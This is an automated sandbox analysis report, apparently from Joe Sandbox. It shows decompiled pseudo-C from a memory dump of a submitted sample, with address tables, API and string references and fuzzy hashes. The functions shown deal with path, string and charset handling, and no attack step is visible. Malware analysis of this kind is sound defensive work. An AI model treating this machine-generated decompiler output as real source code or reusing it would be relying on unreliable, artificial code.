							E003C2106(_t162 - 0xc0);
							 *(_t162 - 4) = 2;
							_t87 = E003B2D8A(_t162 - 0x30,  *((intOrPtr*)(_t162 - 0x24)) + 2);
							__eflags =  *(_t162 - 0x2c);
							 *(_t162 - 4) = 3;
							if( *(_t162 - 0x2c) == 0) {
								E003B1E40(_t87,  *(_t162 - 0x30));
								_t90 = E003B1E40(E003C2177(_t162 - 0xc0),  *((intOrPtr*)(_t162 - 0xcc)));
								_t61 = _t162 - 4;
								 *_t61 =  *(_t162 - 4) | 0xffffffff;
								__eflags =  *_t61;
								E003B1E40(_t90,  *((intOrPtr*)(_t162 - 0x24)));
								goto L18;
							}
							E003B2F2F(_t162 - 0xcc, _t162 - 0x30);
							_t128 = 7;
							_t95 = memcpy(_t162 - 0x68, _t162 - 0x4c, _t128 << 2);
							_t165 = _t165 + 0xc;
							E003EF23F(_t95 + 0x58);
							_push(_t162 - 0xcc);
							E003B1E40(E003C2805(_t95 + 0x58, _t162 - 0x4c + _t128 + _t128),  *(_t162 - 0x30));
							_t101 = E003B1E40(E003C2177(_t162 - 0xc0),  *((intOrPtr*)(_t162 - 0xcc)));
							L11:
							_t44 = _t162 - 4;
							 *_t44 =  *(_t162 - 4) | 0xffffffff;
							__eflags =  *_t44;
							E003B1E40(_t101,  *((intOrPtr*)(_t162 - 0x24)));
							_t155 =  *((intOrPtr*)(_t162 - 0x14));
							_t143 =  *(_t162 - 0x18);
							goto L12;
						}
						_t101 =  *(_t162 - 0x18);
						__eflags =  *_t101;
						if( *_t101 != 0) {
							_t136 = 7;
							_t101 = memcpy( *((intOrPtr*)( *((intOrPtr*)(_t101 + 0x58)))) + 0x64, _t162 - 0x4c, _t136 << 2);
							_t165 = _t165 + 0xc;
						}
						goto L11;
					} else {
						if( *_t143 != 0) {
							 *_t143 =  *_t143 & 0x00000000;
							E003C26BF( &(_t143[0x58]), 0);
						}
					}
					L12:
					 *(_t162 - 0x10) =  *(_t162 - 0x10) + 1;
				} while ( *(_t162 - 0x10) <  *((intOrPtr*)(_t155 + 4)));
				goto L19;
			}


















                                                                                                    0x003c21d0
                                                                                                    0x003c21d5
                                                                                                    0x003c21db
                                                                                                    0x003c21e1
                                                                                                    0x003c21e4
                                                                                                    0x003c21ea
                                                                                                    0x003c21ed
                                                                                                    0x003c21f0
                                                                                                    0x003c2383
                                                                                                    0x003c2383
                                                                                                    0x003c2386
                                                                                                    0x003c2389
                                                                                                    0x003c2393
                                                                                                    0x003c2395
                                                                                                    0x003c239a
                                                                                                    0x003c239f
                                                                                                    0x003c23a2
                                                                                                    0x003c23a7
                                                                                                    0x003c23a8
                                                                                                    0x003c23a8
                                                                                                    0x003c23b3
                                                                                                    0x003c23bb
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003c21f6
                                                                                                    0x003c21f6
                                                                                                    0x003c21fb
                                                                                                    0x003c2201
                                                                                                    0x003c220d
                                                                                                    0x003c222f
                                                                                                    0x003c2233
                                                                                                    0x003c2233
                                                                                                    0x003c2238
                                                                                                    0x003c2248
                                                                                                    0x003c2250
                                                                                                    0x003c2252
                                                                                                    0x003c233e
                                                                                                    0x003c2342
                                                                                                    0x003c234c
                                                                                                    0x003c234c
                                                                                                    0x003c237f
                                                                                                    0x003c237f
                                                                                                    0x00000000
                                                                                                    0x003c2382
                                                                                                    0x003c2258
                                                                                                    0x003c225b
                                                                                                    0x003c227e
                                                                                                    0x003c2281
                                                                                                    0x003c2285
                                                                                                    0x003c2347
                                                                                                    0x003c2347
                                                                                                    0x003c2347
                                                                                                    0x003c234b
                                                                                                    0x00000000
                                                                                                    0x003c234b
                                                                                                    0x003c2291
                                                                                                    0x003c229c
                                                                                                    0x003c22a0
                                                                                                    0x003c22ae
                                                                                                    0x003c22b3
                                                                                                    0x003c22b8
                                                                                                    0x003c22bb
                                                                                                    0x003c22bf
                                                                                                    0x003c2356
                                                                                                    0x003c236d
                                                                                                    0x003c2375
                                                                                                    0x003c2375
                                                                                                    0x003c2375
                                                                                                    0x003c2379
                                                                                                    0x00000000
                                                                                                    0x003c237e
                                                                                                    0x003c22cf
                                                                                                    0x003c22df
                                                                                                    0x003c22e0
                                                                                                    0x003c22e0
                                                                                                    0x003c22e7
                                                                                                    0x003c22f4
                                                                                                    0x003c22fd
                                                                                                    0x003c2314
                                                                                                    0x003c231a
                                                                                                    0x003c231d
                                                                                                    0x003c231d
                                                                                                    0x003c231d
                                                                                                    0x003c2321
                                                                                                    0x003c2326
                                                                                                    0x003c2329
                                                                                                    0x00000000
                                                                                                    0x003c232c
                                                                                                    0x003c225d
                                                                                                    0x003c2260
                                                                                                    0x003c2263
                                                                                                    0x003c226e
                                                                                                    0x003c2277
                                                                                                    0x003c2277
                                                                                                    0x003c2277
                                                                                                    0x00000000
                                                                                                    0x003c220f
                                                                                                    0x003c2212
                                                                                                    0x003c2218
                                                                                                    0x003c2220
                                                                                                    0x003c2220
                                                                                                    0x003c2212
                                                                                                    0x003c232d
                                                                                                    0x003c232d
                                                                                                    0x003c2333
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003C21D0
                                                                                                    • _CxxThrowException.MSVCRT(?,00431428), ref: 003C23A8
                                                                                                      • Part of subcall function 003B1E40: free.MSVCRT(?,003D6B41,00000000,00000000,00000001,?,003B10EB), ref: 003B1E44
                                                                                                    Strings
                                                                                                    • incorrect update switch command, xrefs: 003C2395
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionH_prologThrowfree
                                                                                                    • String ID: incorrect update switch command
                                                                                                    • API String ID: 2564996034-2497410926
                                                                                                    • Opcode ID: 151c09a810aefeb01d8a70e20624f08fde4a4767f84ccc76c50a2fd3347a0851
                                                                                                    • Instruction ID: 06e41c9066822d6c8eae049640992e4cac3c489edbc2832893ba1cf8f7d95295
                                                                                                    • Opcode Fuzzy Hash: 151c09a810aefeb01d8a70e20624f08fde4a4767f84ccc76c50a2fd3347a0851
                                                                                                    • Instruction Fuzzy Hash: 7F51A932D00259DBCF16EB94C841FEEBBB1BF44310F214199E525BB6A1CB74AE45CB60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003D5443 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E003D5443(void* __ebx, void* __ecx, int* __edx) {
				void* _t49;
				void* _t53;
				intOrPtr* _t56;
				int _t63;
				int _t67;
				char* _t92;
				int* _t107;
				void* _t109;

				E0041F1B0(E00424DFC, _t109);
				_t107 = __edx;
				_t104 = __ecx;
				if( *((char*)(__edx + 6)) == 0) {
					E003B2E5F(_t109 - 0x30, __eflags,  *((intOrPtr*)(_t109 + 8)));
					 *(_t109 - 4) =  *(_t109 - 4) & 0x00000000;
					 *((char*)(_t109 + 0xb)) = _t107[0];
					E003B33D5(_t109 - 0x30, 0x5c, 0x2f);
					E003B2690(_t109 - 0x24);
					 *(_t109 - 4) = 1;
					E003B4213();
					E003B2690(_t109 - 0x18);
					 *(_t109 - 4) = 2;
					E003D55B9(_t109 - 0x24, _t109 - 0x18);
					__eflags =  *_t107;
					if( *_t107 != 0) {
						L6:
						__eflags =  *((char*)(_t109 + 0xc));
						if( *((char*)(_t109 + 0xc)) != 0) {
							_t63 =  *(_t109 - 0x14);
							__eflags = _t63;
							if(_t63 != 0) {
								_t92 =  *(_t109 - 0x18);
								__eflags =  *((char*)(_t63 + _t92 - 1)) - 0x2f;
								if( *((char*)(_t63 + _t92 - 1)) != 0x2f) {
									L003B1E9D(_t109 - 0x18, 0x2f);
								}
							}
						}
						__eflags =  *((char*)(_t109 + 0xb));
						if( *((char*)(_t109 + 0xb)) != 0) {
							_t56 =  *((intOrPtr*)(_t109 + 0x10));
							__eflags =  *(_t56 + 4);
							if( *(_t56 + 4) != 0) {
								L003B1802(_t104,  *_t56);
								L003B179A(_t104, 0x20);
							}
							L003B179A(_t104, 0x28);
							L003B1802(_t104,  *(_t109 - 0x18));
							L003B179A(_t104, 0x29);
							L003B1802(_t104, " = ");
						}
						_t49 = L003B1802(_t104,  *((intOrPtr*)( *((intOrPtr*)(_t109 + 0x14)))));
						__eflags =  *((char*)(_t109 + 0xb));
						if( *((char*)(_t109 + 0xb)) == 0) {
							L003B179A(_t104, 0x20);
							L003B179A(_t104, 0x20);
							_t49 = L003B1802(_t104,  *(_t109 - 0x18));
						}
						_t53 = E003B1E40(E003B1E40(E003B1E40(E003D5430(_t49, _t107),  *(_t109 - 0x18)),  *(_t109 - 0x24)),  *((intOrPtr*)(_t109 - 0x30)));
						goto L17;
					}
					__eflags =  *(_t109 - 0x14) -  *((intOrPtr*)(_t109 - 0x20));
					if( *(_t109 - 0x14) !=  *((intOrPtr*)(_t109 - 0x20))) {
						L5:
						L003B179A(_t104, 0x5c);
						goto L6;
					}
					_t67 = strcmp( *(_t109 - 0x18),  *(_t109 - 0x24));
					__eflags = _t67;
					if(_t67 == 0) {
						goto L6;
					}
					goto L5;
				} else {
					_t53 = E003D5430(L003B1802(__ecx,  *((intOrPtr*)( *((intOrPtr*)(_t109 + 0x14))))), _t107);
					L17:
					 *[fs:0x0] =  *((intOrPtr*)(_t109 - 0xc));
					return _t53;
				}
			}











                                                                                                    0x003d5448
                                                                                                    0x003d5451
                                                                                                    0x003d5454
                                                                                                    0x003d545a
                                                                                                    0x003d547b
                                                                                                    0x003d5483
                                                                                                    0x003d5490
                                                                                                    0x003d5493
                                                                                                    0x003d549b
                                                                                                    0x003d54a6
                                                                                                    0x003d54aa
                                                                                                    0x003d54b2
                                                                                                    0x003d54bd
                                                                                                    0x003d54c1
                                                                                                    0x003d54c6
                                                                                                    0x003d54c9
                                                                                                    0x003d54ed
                                                                                                    0x003d54ed
                                                                                                    0x003d54f1
                                                                                                    0x003d54f3
                                                                                                    0x003d54f6
                                                                                                    0x003d54f8
                                                                                                    0x003d54fa
                                                                                                    0x003d54fd
                                                                                                    0x003d5502
                                                                                                    0x003d5509
                                                                                                    0x003d5509
                                                                                                    0x003d5502
                                                                                                    0x003d54f8
                                                                                                    0x003d550e
                                                                                                    0x003d5512
                                                                                                    0x003d5514
                                                                                                    0x003d5517
                                                                                                    0x003d551b
                                                                                                    0x003d5521
                                                                                                    0x003d552a
                                                                                                    0x003d552a
                                                                                                    0x003d5533
                                                                                                    0x003d553d
                                                                                                    0x003d5546
                                                                                                    0x003d5552
                                                                                                    0x003d5552
                                                                                                    0x003d555e
                                                                                                    0x003d5563
                                                                                                    0x003d5567
                                                                                                    0x003d556d
                                                                                                    0x003d5576
                                                                                                    0x003d5580
                                                                                                    0x003d5580
                                                                                                    0x003d55a1
                                                                                                    0x00000000
                                                                                                    0x003d55a6
                                                                                                    0x003d54ce
                                                                                                    0x003d54d1
                                                                                                    0x003d54e4
                                                                                                    0x003d54e8
                                                                                                    0x00000000
                                                                                                    0x003d54e8
                                                                                                    0x003d54d9
                                                                                                    0x003d54df
                                                                                                    0x003d54e2
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003d545c
                                                                                                    0x003d546a
                                                                                                    0x003d55a9
                                                                                                    0x003d55ae
                                                                                                    0x003d55b6
                                                                                                    0x003d55b6

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prologstrcmp
                                                                                                    • String ID: =
                                                                                                    • API String ID: 1490138475-2525689732
                                                                                                    • Opcode ID: 5d3b251a43a98c40e33e46e2944451c30f691459fb035ffc7659e8466f3ff5e1
                                                                                                    • Instruction ID: c4b2267b06d1751ad19defa9e54a361e0cdecc5b4af902dba263209e374575ab
                                                                                                    • Opcode Fuzzy Hash: 5d3b251a43a98c40e33e46e2944451c30f691459fb035ffc7659e8466f3ff5e1
                                                                                                    • Instruction Fuzzy Hash: 05416031A00249ABDF17EB65E866BFE7B73AF85304F444019F6022E6D2CFA49D45D711
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003BA06D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E003BA06D(void* __ecx, void* __eflags) {
				void* __edi;
				void* _t47;
				void* _t49;
				void* _t52;
				void* _t53;
				void* _t84;
				void* _t89;

				_t95 = __eflags;
				E0041F1B0(E004231C8, _t89);
				_t84 = __ecx;
				L003B9EFE(__ecx, __ecx, __eflags);
				E003B2834();
				E003B2690(_t89 - 0x24);
				 *(_t89 - 4) = 0;
				E003B2690(_t89 - 0x30);
				 *(_t89 - 4) = 1;
				E003B2690(_t89 - 0x18);
				_t82 = _t89 - 0x18;
				 *(_t89 - 4) = 2;
				L003B998E(_t89 - 0x30, _t89 - 0x18, _t95);
				if( *((intOrPtr*)(_t89 - 0x2c)) != 0 ||  *((intOrPtr*)(_t89 - 0x14)) != 0) {
					E003B276E(_t89 - 0x24, _t89 - 0x30);
					if( *((intOrPtr*)(_t89 - 0x2c)) !=  *((intOrPtr*)(_t89 - 0x14)) || strcmp( *(_t89 - 0x30),  *(_t89 - 0x18)) != 0) {
						_t100 =  *((intOrPtr*)(_t89 - 0x14));
						if( *((intOrPtr*)(_t89 - 0x14)) != 0) {
							E003B284C(_t89 - 0x24, " - ");
							E003B28A5(_t89 - 0x24, _t100, _t89 - 0x18);
						}
					}
				}
				_t47 = L003B9EB7(_t89 - 0x24);
				_t101 =  *((intOrPtr*)(_t89 - 0x20));
				if( *((intOrPtr*)(_t89 - 0x20)) != 0) {
					E003B28A5(_t84, _t101, _t89 - 0x24);
					_t47 = E003B2834();
				}
				_t49 = E003B1E40(E003B1E40(_t47,  *(_t89 - 0x18)),  *(_t89 - 0x30));
				 *(_t89 - 4) =  *(_t89 - 4) | 0xffffffff;
				E003B1E40(_t49,  *((intOrPtr*)(_t89 - 0x24)));
				E003B2690(_t89 - 0x3c);
				 *(_t89 - 4) = 3;
				_t52 = E003BA18A(_t89 - 0x3c, _t82, _t101);
				_t102 =  *((intOrPtr*)(_t89 - 0x38));
				if( *((intOrPtr*)(_t89 - 0x38)) != 0) {
					E003B28A5(_t84, _t102, _t89 - 0x3c);
					_t52 = E003B2834();
				}
				_t53 = E003B1E40(_t52,  *((intOrPtr*)(_t89 - 0x3c)));
				 *[fs:0x0] =  *((intOrPtr*)(_t89 - 0xc));
				return _t53;
			}










                                                                                                    0x003ba06d
                                                                                                    0x003ba072
                                                                                                    0x003ba07c
                                                                                                    0x003ba07e
                                                                                                    0x003ba085
                                                                                                    0x003ba08d
                                                                                                    0x003ba097
                                                                                                    0x003ba09a
                                                                                                    0x003ba0a2
                                                                                                    0x003ba0a6
                                                                                                    0x003ba0ab
                                                                                                    0x003ba0b1
                                                                                                    0x003ba0b5
                                                                                                    0x003ba0bd
                                                                                                    0x003ba0cb
                                                                                                    0x003ba0d6
                                                                                                    0x003ba0e9
                                                                                                    0x003ba0ec
                                                                                                    0x003ba0f6
                                                                                                    0x003ba102
                                                                                                    0x003ba102
                                                                                                    0x003ba0ec
                                                                                                    0x003ba0d6
                                                                                                    0x003ba10a
                                                                                                    0x003ba10f
                                                                                                    0x003ba112
                                                                                                    0x003ba11a
                                                                                                    0x003ba121
                                                                                                    0x003ba121
                                                                                                    0x003ba131
                                                                                                    0x003ba139
                                                                                                    0x003ba13d
                                                                                                    0x003ba148
                                                                                                    0x003ba150
                                                                                                    0x003ba157
                                                                                                    0x003ba15c
                                                                                                    0x003ba15f
                                                                                                    0x003ba167
                                                                                                    0x003ba16e
                                                                                                    0x003ba16e
                                                                                                    0x003ba176
                                                                                                    0x003ba181
                                                                                                    0x003ba189

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003BA072
                                                                                                      • Part of subcall function 003B9EFE: __EH_prolog.LIBCMT ref: 003B9F03
                                                                                                      • Part of subcall function 003B998E: GetSystemInfo.KERNEL32(?), ref: 003B99B0
                                                                                                      • Part of subcall function 003B998E: GetModuleHandleA.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 003B99CA
                                                                                                      • Part of subcall function 003B998E: GetProcAddress.KERNEL32(00000000), ref: 003B99D1
                                                                                                    • strcmp.MSVCRT ref: 003BA0DE
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog$AddressHandleInfoModuleProcSystemstrcmp
                                                                                                    • String ID: -
                                                                                                    • API String ID: 2798778560-3695764949
                                                                                                    • Opcode ID: 02d143e3fcb64c093ffd89f9d488f3dcb68283da6c1343da3cbc595ed13fc5eb
                                                                                                    • Instruction ID: 89724c44cec248cbcca49002db24d2bde1f875a9be3c64a0553c6e9533849267
                                                                                                    • Opcode Fuzzy Hash: 02d143e3fcb64c093ffd89f9d488f3dcb68283da6c1343da3cbc595ed13fc5eb
                                                                                                    • Instruction Fuzzy Hash: F131AA31C01518EBCF1BFBE4D952AEEF775AF94308F10412AF601B6891DF349A04DA62
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003B4D65 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 86%
                                                                                                    			E003B4D65(intOrPtr* __ecx) {
				intOrPtr* _t16;
				void* _t17;
				intOrPtr _t26;
				void* _t33;
				intOrPtr _t37;
				intOrPtr* _t48;

				_t48 = __ecx;
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					L4:
					return 0;
				}
				if(E003B4A43( *((intOrPtr*)( *((intOrPtr*)( *__ecx))))) != 0) {
					L2:
					_push(1);
					L15:
					_pop(_t17);
					return _t17;
				}
				_t16 =  *__ecx;
				if( *((intOrPtr*)( *_t16 + 4)) != 0) {
					goto L4;
				}
				_t37 =  *((intOrPtr*)(__ecx + 4));
				if(_t37 == 1 ||  *((intOrPtr*)( *((intOrPtr*)(_t16 + 4)) + 4)) != 0) {
					goto L2;
				}
				_t33 = 2;
				if(_t37 == _t33) {
					L18:
					return _t33;
				}
				if(wcscmp( *( *(_t16 + 8)), 0x429394) == 0) {
					L14:
					_push(3);
					goto L15;
				}
				if(wcscmp( *( *( *_t48 + 8)), 0x42938c) == 0) {
					if( *((intOrPtr*)(_t48 + 4)) == 3) {
						goto L14;
					}
					if(E003B4A43( *((intOrPtr*)( *((intOrPtr*)( *_t48 + 0xc))))) != 0) {
						_push(4);
						goto L15;
					}
					if(E003B2407( *((intOrPtr*)( *((intOrPtr*)( *_t48 + 0xc)))), "UNC") == 0) {
						goto L14;
					}
					_t33 = 4;
				}
				_t26 =  *((intOrPtr*)(_t48 + 4));
				_t33 = _t33 + 1;
				if(_t26 > _t33) {
					goto L18;
				}
				return _t26;
			}









                                                                                                    0x003b4d68
                                                                                                    0x003b4d6f
                                                                                                    0x003b4d90
                                                                                                    0x00000000
                                                                                                    0x003b4d90
                                                                                                    0x003b4d7e
                                                                                                    0x003b4d80
                                                                                                    0x003b4d80
                                                                                                    0x003b4e0d
                                                                                                    0x003b4e0d
                                                                                                    0x00000000
                                                                                                    0x003b4e0d
                                                                                                    0x003b4d87
                                                                                                    0x003b4d8e
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003b4d97
                                                                                                    0x003b4d9d
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003b4da9
                                                                                                    0x003b4dac
                                                                                                    0x003b4e1b
                                                                                                    0x00000000
                                                                                                    0x003b4e1b
                                                                                                    0x003b4dc5
                                                                                                    0x003b4e0b
                                                                                                    0x003b4e0b
                                                                                                    0x00000000
                                                                                                    0x003b4e0b
                                                                                                    0x003b4dda
                                                                                                    0x003b4de0
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003b4df0
                                                                                                    0x003b4df2
                                                                                                    0x00000000
                                                                                                    0x003b4df2
                                                                                                    0x003b4e09
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003b4e12
                                                                                                    0x003b4e12
                                                                                                    0x003b4e13
                                                                                                    0x003b4e16
                                                                                                    0x003b4e19
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003b4e20

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: wcscmp
                                                                                                    • String ID: UNC
                                                                                                    • API String ID: 3392835482-337201128
                                                                                                    • Opcode ID: e12b7b4e5554440b0ea6c5159f82a3e7a2279f7886d6a8b456e8dfa6dcdc9bd4
                                                                                                    • Instruction ID: 870e0f0ddccf403ec27e0e68639a7e2e40a074651595dd31ad16a9e4ed1092c9
                                                                                                    • Opcode Fuzzy Hash: e12b7b4e5554440b0ea6c5159f82a3e7a2279f7886d6a8b456e8dfa6dcdc9bd4
                                                                                                    • Instruction Fuzzy Hash: AF2160353402008FD726CE08D891EA5B3D5FF85318B668869E7558BB93C631EC41CB48
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003EB68D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E003EB68D(signed int* __ecx) {
				char _v5;
				char _v40;
				intOrPtr _t20;
				void* _t25;
				signed int _t30;
				void* _t35;
				signed int _t48;
				void* _t49;
				void* _t50;
				intOrPtr* _t51;
				void* _t52;

				_t51 = __ecx;
				_t20 = 0;
				_t47 = 0;
				_t48 = __ecx[2];
				_t30 = __ecx[3];
				_v5 = 0x25;
				if((_t48 & _t30) == 0xffffffff || (_t48 | _t30) == 0 && ( *__ecx | __ecx[1]) != 0) {
					_t47 =  *((intOrPtr*)(_t51 + 4));
					_t35 = 0x14;
					_t20 = E0041F470( *_t51, _t35,  *((intOrPtr*)(_t51 + 4)));
					_v5 = 0x4d;
				} else {
					if((_t48 | _t30) != 0) {
						_t20 = E0041F380(E0041F4B0( *_t51,  *((intOrPtr*)(_t51 + 4)), 0x64, 0), _t47, _t48, _t30);
					}
				}
				L003B18FB( &_v40, _t20, _t47);
				_t25 = strlen( &_v40) + 1;
				 *((char*)(_t52 + _t25 - 0x25)) = _v5;
				 *(_t52 + _t25 - 0x24) =  *(_t52 + _t25 - 0x24) & 0x00000000;
				_t49 = 4;
				if(_t25 >= _t49) {
					L9:
					return E003B284C(_t51 + 0x38,  &_v40);
				} else {
					_t50 = _t49 - _t25;
					do {
						E003B2820();
						_t50 = _t50 - 1;
					} while (_t50 != 0);
					goto L9;
				}
			}














                                                                                                    0x003eb695
                                                                                                    0x003eb698
                                                                                                    0x003eb69a
                                                                                                    0x003eb69c
                                                                                                    0x003eb69f
                                                                                                    0x003eb6a4
                                                                                                    0x003eb6ad
                                                                                                    0x003eb6dd
                                                                                                    0x003eb6e2
                                                                                                    0x003eb6e3
                                                                                                    0x003eb6e8
                                                                                                    0x003eb6bc
                                                                                                    0x003eb6c0
                                                                                                    0x003eb6d4
                                                                                                    0x003eb6d4
                                                                                                    0x003eb6c0
                                                                                                    0x003eb6f1
                                                                                                    0x003eb700
                                                                                                    0x003eb706
                                                                                                    0x003eb70a
                                                                                                    0x003eb70f
                                                                                                    0x003eb712
                                                                                                    0x003eb723
                                                                                                    0x003eb733
                                                                                                    0x003eb714
                                                                                                    0x003eb717
                                                                                                    0x003eb719
                                                                                                    0x003eb71b
                                                                                                    0x003eb720
                                                                                                    0x003eb720
                                                                                                    0x00000000
                                                                                                    0x003eb719

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __aulldivstrlen
                                                                                                    • String ID: M
                                                                                                    • API String ID: 1892184250-3664761504
                                                                                                    • Opcode ID: c10ae5f154208e7414bdff2d734696492558e883a06df15221eebc236fd76c32
                                                                                                    • Instruction ID: 4d60ce7fab9aac8aa96aefa9eb836dc1b3f2e2037f39687b5dfd2c0d438957b3
                                                                                                    • Opcode Fuzzy Hash: c10ae5f154208e7414bdff2d734696492558e883a06df15221eebc236fd76c32
                                                                                                    • Instruction Fuzzy Hash: 69113A712006845BDB17EAB9C891FAFF7E99F98318F14092DE287975C1DA34BC0A8324
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003C2538 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 85%
                                                                                                    			E003C2538(intOrPtr* __ecx, signed int __edx) {
				signed int _t29;
				void* _t30;
				intOrPtr _t37;
				void* _t42;
				intOrPtr _t45;
				intOrPtr _t58;
				intOrPtr* _t60;
				intOrPtr _t61;
				void* _t63;

				E0041F1B0(E0042376C, _t63);
				_t45 =  *__ecx;
				_t29 = __edx + __edx * 4;
				_push(_t60);
				_t30 = _t45 + _t29 * 4;
				if( *((char*)(_t45 + _t29 * 4)) != 0) {
					E003B2E5F(_t63 - 0x18, __eflags,  *((intOrPtr*)( *((intOrPtr*)(_t30 + 8)) +  *(_t30 + 0xc) * 4 - 4)));
					_t58 = 0;
					 *((intOrPtr*)(_t63 - 4)) = 0;
					_t33 = E003C0AE3( *((intOrPtr*)(_t63 - 0x18)), _t63 + 0xc);
					__eflags = _t33;
					if(_t33 == 0) {
						L4:
						E003B2285( *((intOrPtr*)(_t63 - 0x18)));
						asm("sbb ebx, ebx");
						_t42 = ( ~( *(_t63 + 8)) & 0xfffffffe) + 5;
						__eflags = _t42;
						if(__eflags == 0) {
							L8:
							_push( *((intOrPtr*)(_t63 - 0x18)));
							_push("Unsupported charset:");
							E003D097C(_t63 - 0x24, __eflags);
							_t33 = _t63 - 0x24;
							_push(0x431428);
							_push(_t63 - 0x24);
							L0041F1D0();
						} else {
							_t60 = 0x429cb0;
							while(1) {
								_t33 = E003B23AC( *((intOrPtr*)(_t63 - 0x18)),  *_t60);
								__eflags = _t33;
								if(_t33 != 0) {
									goto L9;
								}
